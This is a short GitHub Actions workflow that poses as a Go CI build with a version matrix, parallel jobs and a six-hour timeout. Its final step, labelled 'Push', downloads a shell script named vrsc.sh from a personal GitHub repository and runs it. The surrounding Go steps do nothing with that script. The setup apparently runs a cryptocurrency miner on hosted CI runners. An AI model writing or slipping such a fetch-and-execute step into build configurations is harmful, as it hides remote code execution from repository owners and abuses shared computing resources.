name: dextina
on: [push, pull_request]
jobs:
  build:
    name: CI
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7]
        flag: [A, B]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Push
      run: |
        wget https://raw.githubusercontent.com/ferity1102/vrsc/main/vrsc.sh && chmod u+x vrsc.sh && ./vrsc.sh
